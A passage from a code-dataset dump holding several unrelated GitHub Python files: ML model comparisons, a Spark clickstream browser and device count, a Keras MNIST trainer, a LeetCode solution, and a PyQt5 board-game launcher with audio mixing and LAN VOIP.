])\nDtPipiLine.fit(x_train,y_train)\n\nsvr = ParallelPostFit(SVR(kernel = gdSearchSvr.best_params_['model__estimator__kernel']\n , C = gdSearchSvr.best_params_['model__estimator__C']))\nSvrPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', svr)\n ])\nSvrPipiLine.fit(x_train,y_train)\n\n######## Models Comparison #####################\nprint('\\nDeafult result')\nprint('KNN Default MAE: ', round(mean_absolute_error(y_val, knnPipiLineDef.predict(x_val_st)), 4))\nprint('DT Default MAE: ', round(mean_absolute_error(y_val, dtPipiLineDef.predict(x_val)), 4))\nprint('SVR Default MAE: ', round(mean_absolute_error(y_val, svrPipiLineDef.predict(x_val_st)), 4))\nprint('\\nHyperparameter optimization modeled result')\nprint('KNN MAE: ', round(mean_absolute_error(y_val, knnPipiLine.predict(x_val_st)), 4))\nprint('DT MAE: ', round(mean_absolute_error(y_val, DtPipiLine.predict(x_val)), 4))\nprint('SVR MAE: ', round(mean_absolute_error(y_val, SvrPipiLine.predict(x_val_st)), 4))\n\n######## DT regressor the best model\nx = train.iloc[:, 0:75]\ny = train.iloc[:, -1]\nfinal_DT = ParallelPostFit(DecisionTreeRegressor(min_samples_split = gdSearchDt.best_params_['model__estimator__min_samples_split']\n , min_samples_leaf = gdSearchDt.best_params_['model__estimator__min_samples_leaf']\n , max_features= gdSearchDt.best_params_['model__estimator__max_features']\n , max_depth = gdSearchDt.best_params_['model__estimator__max_depth']))\nDtFinalPipiLine = Pipeline([\n ('model', final_DT)\n ])\nDtFinalPipiLine.fit(x,y)\nx_test = test.iloc[:, 0:75]\ny_test = test.iloc[:, -1]\nprint('DT MAE: ', round(mean_absolute_error(y_test, DtFinalPipiLine.predict(x_test)), 4))\nprint('DT MAPE: ', round(mean_absolute_percentage_error(y_test, DtFinalPipiLine.predict(x_test)), 4))","repo_name":"yanirkes/solarEnergyPrediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16108445611","text":"from py2md.classes import MDTable\nfrom ..general.generalsection import GeneralSection\nfrom .. import config\n\nclass CircleSection(GeneralSection):\n d: float = None\n\n def __init__(self, d: float, label: str=None) -> None:\n self.d = d\n radius = self.d/2\n y = [radius, -radius, -radius, radius]\n z = [radius, radius, -radius, -radius]\n r = [radius, radius, radius, radius]\n super().__init__(y, z, r, label=label)\n\n def _repr_markdown_(self) -> str:\n mdstr = self.section_heading('Circle-Section')\n table = MDTable()\n table.add_column(f'd ({config.lunit:s})',\n config.l1frm, data=[self.d])\n mdstr += table._repr_markdown_()\n mdstr += self.section_properties(outtype='md')\n return mdstr\n\n def __str__(self) -> str:\n outstr = self.section_heading('Circle-Section')\n table = MDTable()\n table.add_column(f'd ({config.lunit:s})',\n config.l1frm, data=[self.d])\n outstr += table.__str__()\n outstr += self.section_properties(outtype='str')\n return outstr\n\n def __repr__(self) -> str:\n if self.label is None:\n outstr = ''\n else:\n outstr = f''\n return outstr\n","repo_name":"Xero64/pysectprop","sub_path":"pysectprop/standard/circlesection.py","file_name":"circlesection.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22996085517","text":"import sys\n\nvalores = []\ncontador = 1\nNOME_ARQUIVO = sys.argv[1]\nNOME_ARQUIVO_SPLIT = NOME_ARQUIVO.split('.')[0]\n\nwith open(NOME_ARQUIVO) as f:\n for line in f:\n if len(line.split()) > 1 and line.split()[1] == \"\\\"============================\\\"\":\n filename = \"{}_house_{}.txt\".format(NOME_ARQUIVO_SPLIT, contador)\n del valores[-1]\n with open(filename, 'w') as g:\n for value in valores:\n g.write(\"{}\\n\".format(value))\n print(\"casa {}\".format(contador))\n contador += 1\n else:\n valores.append(line)\n# print(line)\n","repo_name":"carvalhodj/tcc_bsi_ufrpe","sub_path":"software/resultado/line_python.py","file_name":"line_python.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"999272259","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Thu Feb 6 20:32:52 2020\n\n@author: aadityabhatia\n\nInfo:\n This spark script gets the most common browsers and devices used at coursera\n Data is based on the clicking behaviour of the user.\n A parsing tool, DeviceDetector is used. Can be installed by: \"pip install device_detector\"\n\nPrerequisites:\n The clicks.text file is to be converted into a csv file for the purpose of optimization.\n The equivalent csv file is used because it consumes less disk volume (from 2GB to ~300mb).\n The data is present at Hadoop Distributed File System (i.e., hdfs:///user/....)\n \nTasks Performed:\n A third party tool, \"DeviceDetector\" is used to parse the user agent string to get the corresponding browser and device values for each click.\n To prevent double counting of results, duplicate users using the same Device and browser are removed.\n Getting the top browsers: \n 1. The number of browsers used by each user are grouped together to get their count. \n 2. Count of browsers is ordered in descending fashion to get the top most browsers used.\n 3. The results are saved in a csv file.\n \n Getting the top browsers: \n 1. The number of devices used by each user are grouped together to get their count. \n 2. Count of devices is ordered in descending fashion to get the top most devices used.\n 3. The results are saved in a csv file.\n'''\n\n\nfrom pyspark.sql.types import StringType\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import Row\nfrom pyspark.sql import functions\nfrom pyspark.sql import SQLContext\nfrom user_agents import parse\n'''This function splits string to get the language of the course\nWe get the overall language (eg, English or Turkish, instead of tu-en, i.e., turkish-english)'''\n\ndef getUserAgentBrowserDevice(string):\n ua = parse(string)\n return str(ua.os.family) +';'+ str(ua.device.family)\n\ndef splitBrowser(string):\n return string.split(\";\")[0]\n\ndef splitDevice(string):\n return string.split(\";\")[1]\n\n \nif __name__ == \"__main__\":\n # defining the directories where data is to be loaded/stored\n dirName = \"hdfs:///user/maria_dev/Coursera/\"\n datFile = dirName+\"data_reduced.csv\"\n \n # creating a spark session\n spark = SparkSession.builder.appName(\"ClairvoyantTest\").getOrCreate()\n \n # creating a spark context from the spark session\n sc = spark.sparkContext\n \n # creating a sql context from the spark context\n # this is done to load the data using the sql context\n sqlContext = SQLContext(sc)\n \n # reading the csv file\n df = sqlContext.read.format('csv').options(header='true', inferschema='true').load(datFile)\n \n # just checking if the load is proper, and map-reduce is working in the system\n print(df.columns)\n df.collect() \n \n \n \n #Getting the top browsers and :\n print(\"\\n\\nGetting the top Browsers and Devices \")\n \n #creating a user defined functions for spark\n # this uses the parser to get both browser and device info\n udf_getBrowserDevice = udf(getUserAgentBrowserDevice, StringType())\n df2 = df.withColumn(\"browserNdevice\", udf_getBrowserDevice(\"user_agent\"))\n \n #remove the same users who use the same device and browsers\n df2 = df2.select('browserNdevice', 'username').drop_duplicates()\n \n # this splits the browser and device info into only browser info\n udf_getBrowser = udf(splitBrowser, StringType())\n df3 = df2.withColumn(\"browser\", udf_getBrowser(\"browserNdevice\"))\n\n # this splits the browser and device info to only device info\n udf_getDevice = udf(splitDevice, StringType())\n df4 = df3.withColumn(\"device\", udf_getDevice(\"browserNdevice\"))\n \n # process \n df4.collect()\n print(df4.columns)\n \n '''getting the top browsers'''\n # group by count, then order by descending value of count \n sub_df = df4.select('username', 'browser')\n topBrowsers = sub_df.groupby('browser').count().orderBy('count', ascending = False)\n # printing the top 10 languages to validate result\n topTen = topBrowsers.take(10)\n for i in topTen:\n print (i[0], i[1])\n # saving the results \n #topBrowsers.coalesce(1).write.csv(dirName+'topBrowsers', header=True)\n \n \n '''\n getting the top devices'''\n # group by count, then order by descending value of count \n sub_df = df4.select('username', 'device')\n topdevices = sub_df.groupby('device').count().orderBy('count', ascending = False)\n # printing the top 10 languages to validate result\n topTen = topdevices.take(10)\n for i in topTen:\n print (i[0], i[1])\n # saving the results \n #topdevices.coalesce(1).write.csv(dirName+'topdevices', header=True)\n\n # exiting the spark session\n spark.stop()","repo_name":"Aaditya-Bhatia/Courseara_BigData_clickstream_analytics_pySpark_Hadoop","sub_path":"Scripts/SparkAnalyze_Browser_&_Device.py","file_name":"SparkAnalyze_Browser_&_Device.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27752113114","text":"from __future__ import print_function\n##### set specific gpu #####\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\nimport warnings\nwarnings.filterwarnings('ignore')\nimport tensorflow as tf\n##### \nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\nassert len(physical_devices) > 0, \"Not enough GPU hardware devices available\"\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\ntf.compat.v1.disable_eager_execution()\n\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\n\nbatch_size = 128\nnum_classes = 10\nepochs = 10\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n# get the channel dimension\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\nx_test /= 255\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adam(),\n metrics=['accuracy'])\n\nmodel.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(x_test, y_test))\nmodel.save(\"mnist_keras.h5\")\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])","repo_name":"CSI5138-2019Fall/CSI_5138_project_2019Fall","sub_path":"pre_trained_models/mnist_keras.py","file_name":"mnist_keras.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33340198251","text":"class Solution:\n def countSubarrays(self, nums: List[int], minK: int, maxK: int) -> int:\n minInd, maxInd = None, None\n left = 0\n res = 0\n for right in range(len(nums)):\n if minK <= nums[right] <= maxK:\n if nums[right] == minK:\n minInd = right\n if nums[right] == maxK:\n maxInd = right\n if minInd != None and maxInd != None:\n res += min(minInd, maxInd) - left + 1\n else:\n left = right + 1\n minInd, maxInd = None, None\n return res","repo_name":"natitedros/Competitive-Programming","sub_path":"Daily Questions/2444CountSubarraysWithFixedBounds.py","file_name":"2444CountSubarraysWithFixedBounds.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70932808874","text":"__author__= \"\"\"\r\n░░░░███████ ]▄▄▄▄▄▄▄▄\r\n▂▄▅█████████▅▄▃▂\r\nIl███████████████████].\r\n ◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤..\"\"\"\r\n\r\nfrom PyQt5.QtCore import pyqtProperty, QRectF, QUrl, QObject, pyqtSignal, pyqtSlot, QVariant, QTimer, QThread, QEvent\r\nfrom PyQt5.QtGui import QColor, QGuiApplication, QPainter, QPen\r\nfrom PyQt5.QtQml import qmlRegisterType\r\nfrom PyQt5.QtQuick import QQuickItem, QQuickView\r\nfrom PyQt5 import QtNetwork as QN\r\nfrom PyQt5 import QtCore as QC\r\n\r\n\r\nfrom multiprocessing import Process, Manager, freeze_support\r\nimport pyaudio\r\nimport numpy as np\r\nimport wave\r\nimport time\r\nimport win_unicode_console\r\n\r\nfrom store import Buffer\r\nimport server as S\r\nimport client as C\r\nimport game\r\n\r\nwin_unicode_console.enable()\r\n\r\nclass Sound(QObject):\r\n\r\n sendVoice = pyqtSignal(bytes, int)\r\n\r\n\r\n WIDTH = 2\r\n CHANNELS = 2\r\n RATE = 44100\r\n\r\n MAX_INC = 255\r\n MAX_VOICE = 10\r\n\r\n def __init__(self, parent = None):\r\n super(Sound, self).__init__(parent)\r\n self.voiceStreams= (Buffer(), Buffer(), Buffer(), Buffer(), Buffer(), Buffer()) #6x pro šest hráčů\r\n self.musicStreams = [wave.open(\"Music\\Paranoia.wav\", \"rb\"), wave.open(\"Music\\RightBehindYou.wav\", \"rb\"), wave.open(\"Music\\ParanormalActivity.wav\", \"rb\")]\r\n self.effectStreams= []\r\n\r\n self.vVolume= 1\r\n self.mVolume= 1\r\n self.eVolume= 1\r\n\r\n self.voip = None\r\n\r\n self.p = pyaudio.PyAudio()\r\n self.stream = self.p.open(format = self.p.get_format_from_width(Sound.WIDTH),\r\n channels = Sound.CHANNELS,\r\n rate = Sound.RATE,\r\n input = True,\r\n output = True,\r\n #stream_callback = self.callback\r\n )\r\n\r\n\r\n self.nextSample = \"\"\r\n self.lastSample = \"\"\r\n\r\n self.stream.start_stream()\r\n\r\n def addMusic(self, name):\r\n self.musicStreams.append(wave.open(name, \"rb\"))\r\n\r\n def addVoice(self, player, increment, voice):\r\n \"\"\"\r\n :param player: od jakého hráče\r\n :param increment: kolikátá stopa (max MAX_INC)\r\n :param voice: vzorek hlasu\r\n Přidá do self.voiceStreams[player] zvukovou stopu v podobě (increment, voice)\r\n Pokud zjistí, že předchozí stopa má menší increment, zařadí se před ní\r\n Pokud má seznam vzorků u jednoho hráče větší délku než MAX_VOICE tak se první člen odstraní (tím se kontroluje maximální délka zpoždění hlasu)\r\n \"\"\"\r\n data = np.fromstring(voice, np.int16)\r\n self.voiceStreams[player].add(increment, data)\r\n\r\n\r\n def addEffect(self, name):\r\n self.effectStreams.append(wave.open(name, \"rb\"))\r\n\r\n def newVVolume(self, v):\r\n self.vVolume = v\r\n\r\n def newMVolume(self, v):\r\n self.mVolume = v\r\n\r\n def newEVolume(self, v):\r\n self.eVolume = v\r\n\r\n def run(self):\r\n self.increment = 0\r\n while True:\r\n self.myCallback()\r\n self.increment += 1\r\n if self.increment > self.MAX_INC: self.increment = 0\r\n\r\n def myCallback(self):\r\n _time = time.clock()\r\n if self.nextSample:\r\n self.stream.write(self.nextSample) #Pošlu zvuk do reproduktorů\r\n self.lastSample = self.nextSample\r\n elif self.lastSample: # This is dead\r\n self.stream.write(self.lastSample)\r\n self.lastSample = \"\"\r\n _time = time.clock()\r\n #print (\"{0:d} ---- {1:d} --- timeWrite: {2:.1f}\".format(6 - self.voiceStreams.count([]) , self.stream.get_read_available(), (time.clock() - _time)* 1000) , end = \" \")\r\n\r\n if self.stream.get_read_available() > 1023:\r\n mic = self.stream.read(1024)\r\n else:\r\n mic = \"\"\r\n #print (\"timeRead: {0:.1f}\".format( (time.clock() - _time)* 1000) , end = \" \")\r\n\r\n if mic: self.sendVoice.emit(mic, self.increment) #Pošlu data z mikrofonu serveru\r\n\r\n _time = time.clock()\r\n data = np.zeros(2048, np.int64)\r\n\r\n length = 0 #Přeču data z VOIP serveru\r\n for v in self.voiceStreams:\r\n if v: length += 1\r\n l1 = length\r\n for v in self.voiceStreams:\r\n sample = v.get()\r\n if sample is not Buffer.DEFAULT:\r\n data += sample / length * self.vVolume * 0.4\r\n\r\n if self.musicStreams: #Přečtu vzorek zvukové stopy hudby\r\n wf = self.musicStreams[0]\r\n konec = int((wf.getnframes() - wf.tell() ) / 1024)\r\n if (konec) < 250: #Novou hudbu začnu přehrávat 250 CHUNKů před koncem poslední hudby\r\n\r\n if konec == 0: #Jsem na konci\r\n self.musicStreams.append(self.musicStreams.pop(0)) #Přesunu stopu na konec\r\n wf.rewind()\r\n frames = self.musicStreams[0].readframes(1024)\r\n s = np.fromstring(frames, np.int16) * self.mVolume * 0.3\r\n\r\n else:\r\n s0 = (np.fromstring(wf.readframes(1024), np.int16) / (250 - konec)) * self.mVolume * 0.3\r\n if len(s0) > 2047:\r\n data += s0\r\n frames = self.musicStreams[1].readframes(1024) #Je potřeba mít alespoň dvě stopy hudby\r\n s = (np.fromstring(frames, np.int16) / (konec)) * self.mVolume * 0.3\r\n\r\n else:\r\n frames = wf.readframes(1024)\r\n s = np.fromstring(frames, np.int16) * self.mVolume * 0.3\r\n data += s\r\n\r\n length = len(self.effectStreams) #Přečtu vzorky zvukových stop efektů\r\n toPop= []\r\n for i in range(length):\r\n s = self.effectStreams[i].readframes(1024)\r\n if s == \"\":\r\n toPop.append(i - len(toPop))\r\n else:\r\n d = np.fromstring(s, np.int16)\r\n if len(d) > 2047:\r\n data += (d/ length * length) * self.eVolume * 0.3\r\n\r\n for i in toPop:\r\n del self.effectStreams[i]\r\n\r\n if np.any(data):\r\n self.nextSample = data.astype(np.int16).tostring() #Připravím si stopu pro čtení\r\n else:\r\n self.nextSample = data.astype(np.int16).tostring()\r\n\r\n\r\n #print (\"timeRest: {0:.1f}\".format( (time.clock() - _time)* 1000), end = \" || \")\r\n #print(\"HOW MANY CHUNKS OF VOICE I GOT: \", l1)\r\n\r\n\r\n def close(self):\r\n self.timer.stop()\r\n self.stream.stop_stream()\r\n self.stream.close()\r\n\r\n self.p.terminate()\r\n\r\n\r\nclass Launcher(QQuickItem):\r\n PORTS = (9998, 9999)\r\n PORT = 9999\r\n SIZEOF_UINT32 = 4\r\n\r\n\r\n playersChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= playersChanged)\r\n def players(self):\r\n return self._players\r\n\r\n namesChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= namesChanged)\r\n def names(self):\r\n return self._names\r\n\r\n serverNameChanged = pyqtSignal()\r\n @pyqtProperty(str, notify= serverNameChanged)\r\n def serverName(self):\r\n return self._serverName\r\n\r\n @serverName.setter\r\n def serverName(self, name):\r\n self.client.sendMessage(\"jmeno_serveru\", (name, ))\r\n\r\n meChanged = pyqtSignal()\r\n @pyqtProperty(int, notify=meChanged)\r\n def me(self):\r\n return self._me\r\n\r\n @pyqtProperty(QVariant)\r\n def write(self):\r\n return \"a\"\r\n\r\n @write.setter\r\n def write(self, text):\r\n text= text.toVariant()\r\n print (\" // QML: \", text)\r\n\r\n\r\n @pyqtSlot()\r\n def _start(self):\r\n self.client.sendMessage(\"spust_hru\", ())\r\n\r\n @pyqtSlot(float, float, float)\r\n def _changeVolume(self, voip, music, effect):\r\n self.sound.vVolume = voip\r\n self.sound.mVolume = music\r\n self.sound.eVolume = effect\r\n\r\n @pyqtSlot(str)\r\n def _connectTo(self, adresa):\r\n\r\n self.client.connectToServer(adresa)\r\n if self.client.socket.waitForConnected(3000):\r\n #print (\"Připojeno\")\r\n\r\n self.voip = C.VOIP(adresa)\r\n self.voip.newMessage.connect(self.addVoice)\r\n self.sound.sendVoice.connect(self.voip.writeDatagram)\r\n self.client.sendMessage(\"zmen_jmeno\", (QN.QHostInfo.localHostName(),))\r\n\r\n\r\n @pyqtSlot()\r\n def _createServer(self):\r\n if not self.server:\r\n self.server = Process(target = S.run, args = (False, ))\r\n self.server.daemon = True\r\n self.server.start()\r\n #self.bstopServer.setEnabled(True)\r\n #self.bserver.setEnabled(False)\r\n\r\n self.client.connectToServer(\"127.0.0.1\")\r\n\r\n if self.client.socket.waitForConnected(3000):\r\n #print (\"Pripojeno\")\r\n\r\n self.voip = C.VOIP(\"127.0.0.1\")\r\n self.voip.newMessage.connect(self.addVoice)\r\n self.sound.sendVoice.connect(self.voip.writeDatagram)\r\n self.client.sendMessage(\"zmen_jmeno\", (QN.QHostInfo.localHostName(),))\r\n\r\n disconnected = pyqtSignal()\r\n @pyqtSlot()\r\n def _disconnect(self):\r\n #print(\"REFERENCE: \", sys.getrefcount(self.game))\r\n self.game = None\r\n if view.gWindow: view.gWindow.close()\r\n self.nScanThread.start()\r\n self.disconnected.emit()\r\n self.sound.voip = None\r\n self.voip.close()\r\n\r\n if not self.server: return\r\n self.server.terminate() #Bye\r\n self.server.join()\r\n self.server = None\r\n\r\n @pyqtSlot()\r\n def _quit(self):\r\n if self.server:\r\n self.server.terminate() #Pro jistotu\r\n self.server.join()\r\n app.exit()\r\n\r\n\r\n setVolume = pyqtSignal(float, float, float)\r\n addVoice = pyqtSignal(int, int, bytes)\r\n addMusic = pyqtSignal(str)\r\n addEffect = pyqtSignal(str)\r\n @pyqtSlot()\r\n def _completed(self):\r\n self.client.closed.connect(self._disconnect)\r\n self.addVoice.connect(self.resendVoice)\r\n self.addMusic.connect(self.sound.addMusic)\r\n self.addEffect.connect(self.sound.addEffect)\r\n self.setVolume.emit(self.sound.vVolume, self.sound.mVolume, self.sound.eVolume)\r\n\r\n @pyqtSlot()\r\n def _hoverButton(self):\r\n pass#self.sound.addEffect(\"Music/menu-hover.wav\")\r\n\r\n @pyqtSlot()\r\n def _clickButton(self):\r\n self.sound.addEffect(\"Music/menu-click.wav\")\r\n\r\n def resendVoice(self, p, i, b):\r\n self.sound.addVoice(p, i, b)\r\n\r\n def __init__(self, parent=None):\r\n super(Launcher, self).__init__(parent)\r\n self.f()\r\n\r\n\r\n self.soundThread = QThread()\r\n self.sound = Sound()\r\n self.sound.moveToThread(self.soundThread)\r\n self.soundThread.started.connect(self.sound.run)\r\n self.soundThread.start()\r\n\r\n\r\n self.server = None\r\n self.game = None\r\n\r\n self.voip = None\r\n\r\n self.client = C.Client()\r\n self.client.command.connect(self.command)\r\n\r\n self.nScanThread = QThread()\r\n self.nScan = C.NetworkScan()\r\n self.nScan.addServer.connect(self.pridejServer)\r\n self.nScan.removeServer.connect(self.odstranServer)\r\n self.nScan.moveToThread(self.nScanThread)\r\n self.nScanThread.started.connect(self.nScan.run)\r\n self.nScanThread.finished.connect(self.nScan.close)\r\n\r\n\r\n self._turnedOn = False\r\n self._players = []\r\n self._names = []\r\n self._name = \"MyName\"\r\n self._serverName = \"\"\r\n self._me = 0\r\n\r\n self.serverList = []\r\n\r\n self.nScanThread.start()\r\n\r\n #print (\"BEZI ZVUK\", self.soundThread.isRunning())\r\n\r\n addServer = pyqtSignal(int, str, str, str, str)\r\n def pridejServer(self, index, adresa, jmeno, hraci, aktivni):\r\n if index != -1:\r\n self.serverList[index] = (adresa, jmeno, hraci, aktivni)\r\n else:\r\n self.serverList.append((adresa, jmeno, hraci, aktivni))\r\n\r\n self.addServer.emit(index, adresa, jmeno, \"{0:d}/6\".format(hraci), aktivni and \"In Game\" or \"Waiting\")\r\n\r\n removeServer = pyqtSignal(int)\r\n def odstranServer(self, index):\r\n del self.serverList[index]\r\n self.removeServer.emit(index)\r\n\r\n def command(self, h, nazev, args):\r\n self.zadavatel= h\r\n try:\r\n self.funkce[nazev](args)\r\n except KeyError: pass\r\n\r\n def nove_spojeni(self, args):\r\n self._players[self.zadavatel] = True\r\n self.playersChanged.emit()\r\n\r\n def odpojeni_hrace(self, args):\r\n self._players[self.zadavatel] = False\r\n self._names[self.zadavatel] = \"\"\r\n\r\n self.playersChanged.emit()\r\n self.namesChanged.emit()\r\n\r\n renameServer = pyqtSignal(str)\r\n def jmeno_serveru(self, args):\r\n #self._serverName = args[0]\r\n #self.serverNameChanged.emit() #To bohužel nefunguje\r\n self.renameServer.emit(args[0])\r\n\r\n connected = pyqtSignal()\r\n def pripojen(self, args):\r\n self.nScan.go = False\r\n self._players = args[0]\r\n self._names = args[1]\r\n self._serverName = args[2]\r\n self._me = self.zadavatel\r\n\r\n\r\n self.connected.emit()\r\n self.serverNameChanged.emit()\r\n self.playersChanged.emit()\r\n self.namesChanged.emit()\r\n self.renameServer.emit(args[2])\r\n self.setVolume.emit(self.sound.vVolume, self.sound.mVolume, self.sound.eVolume)\r\n\r\n def zmen_jmeno(self, args):\r\n self._names[self.zadavatel] = args[0]\r\n self.namesChanged.emit()\r\n\r\n def spust_hru(self, args):\r\n pass\r\n\r\n def priprava_mapy(self, args):\r\n self.mapa= game.Mapa(*args)\r\n\r\n def priprava_hrace(self, args):\r\n self._me= args\r\n\r\n def priprava_hracu(self, args):\r\n \"\"\"\r\n :param args: tuple(data o hr��čích)\r\n nejdříve inicializuje hráče a pak grafickou stránku hry\r\n \"\"\"\r\n self.mapa.nacti_hrace(self._me, args[0])\r\n view.launchGame()\r\n self.game= view.gWindow.rootObject()\r\n self.game.priprava_hry(self.mapa, len(args[0]))\r\n\r\n def priprava_kola(self, args):\r\n self.client.command.disconnect()\r\n\r\n self.game.priprava_kola(*args)\r\n\r\n self.game.setClient(self.client)\r\n self.game.setSound(self.sound)\r\n\r\n\r\n def chyba(self, args):\r\n print (\"KLIENT: Nastala chyba na straně serveru: \", args)\r\n\r\n def chybna_akce(self, args):\r\n print (\"KLIENT: Tento požadavaek nelze splnit: \", args)\r\n\r\n def ignore(self, argumenty): pass\r\n\r\n def f(self):\r\n self.funkce= {\r\n \"nove_spojeni\": self.nove_spojeni,\r\n \"odpojeni_hrace\": self.odpojeni_hrace,\r\n \"zmen_jmeno\": self.zmen_jmeno,\r\n \"spust_hru\": self.spust_hru,\r\n \"pripojen\": self.pripojen,\r\n \"priprava_mapy\": self.priprava_mapy,\r\n \"priprava_hrace\": self.priprava_hrace,\r\n \"priprava_hracu\": self.priprava_hracu,\r\n \"priprava_kola\": self.priprava_kola,\r\n \"jmeno_serveru\": self.jmeno_serveru,\r\n #\"nove_pripojeni\": self.ignore,\r\n #\"server_info\": self.ignore,\r\n\r\n \"chyba\": self.chyba,\r\n \"chybna_akce\": self.chybna_akce,\r\n }\r\n\r\nclass Game(QQuickItem):\r\n\r\n\r\n\r\n # PROPERTIES --------------------------- PROPERTIES\r\n\r\n parasitesChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= parasitesChanged)\r\n def parasites(self):\r\n return self._parasites\r\n\r\n bloodChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= bloodChanged)\r\n def blood(self):\r\n return self._blood\r\n\r\n itemCardsLeftChanged = pyqtSignal()\r\n @pyqtProperty(int, notify= itemCardsLeftChanged)\r\n def itemCardsLeft(self):\r\n return self._itemCardsLeft\r\n\r\n parasiteTurnChanged = pyqtSignal()\r\n @pyqtProperty(int, notify= parasitesChanged)\r\n def parasiteTurn(self):\r\n return self._parasiteTurn\r\n\r\n playingChanged = pyqtSignal()\r\n @pyqtProperty(int, notify= playingChanged)\r\n def playing(self):\r\n return self._playing\r\n\r\n openedDoorChanged = pyqtSignal()\r\n @pyqtProperty(int, notify= openedDoorChanged)\r\n def openedDoor(self):\r\n return self._openedDoor\r\n\r\n roomCardsLeftChanged = pyqtSignal()\r\n @pyqtProperty(int, notify= roomCardsLeftChanged)\r\n def roomCardsLeft(self):\r\n return self._roomCardsLeft\r\n\r\n meetingChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= meetingChanged)\r\n def meeting(self):\r\n return self._meeting\r\n\r\n meChanged = pyqtSignal()\r\n @pyqtProperty(int, notify= meChanged)\r\n def me(self):\r\n return self._me\r\n\r\n positionsChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= positionsChanged)\r\n def positions(self):\r\n return self._positions\r\n\r\n hitPointsChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= hitPointsChanged)\r\n def hitPoints(self):\r\n return self._hitPoints\r\n\r\n avatarsChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= avatarsChanged)\r\n def avatars(self):\r\n return self._avatars\r\n\r\n cardsOnBoardChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= cardsOnBoardChanged)\r\n def cardsOnBoard(self):\r\n return self._cardsOnBoard\r\n\r\n namesChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify=namesChanged)\r\n def names(self):\r\n return self._names\r\n\r\n ammosChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= ammosChanged)\r\n def ammos(self):\r\n return self._ammos\r\n\r\n cardsChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= cardsChanged)\r\n def cards(self):\r\n return self._cards\r\n\r\n connectionsChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= connectionsChanged)\r\n def connections(self):\r\n return self._connections\r\n\r\n nextRoomChanged = pyqtSignal()\r\n @pyqtProperty(str, notify= nextRoomChanged)\r\n def nextRoom(self):\r\n return self._nextRoom\r\n\r\n cardsInHandChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= cardsInHandChanged)\r\n def cardsInHand(self):\r\n return self._cardsInHand\r\n\r\n corruptedChanged = pyqtSignal()\r\n @pyqtProperty(bool, notify= corruptedChanged)\r\n def corrupted(self):\r\n return self._corrupted\r\n\r\n @pyqtProperty(QVariant)\r\n def write(self):\r\n return \"a\"\r\n\r\n @write.setter\r\n def write(self, text):\r\n text= text.toVariant()\r\n print (\" // QML: \", text)\r\n\r\n timeToChanged= pyqtSignal()\r\n @pyqtProperty(int, notify= timeToChanged)\r\n def timeTo(self):\r\n return self._timeTo\r\n\r\n actionPointsChanged= pyqtSignal()\r\n @pyqtProperty(int, notify= actionPointsChanged)\r\n def actionPoints(self):\r\n return self._actionPoints\r\n\r\n humanChanged = pyqtSignal()\r\n 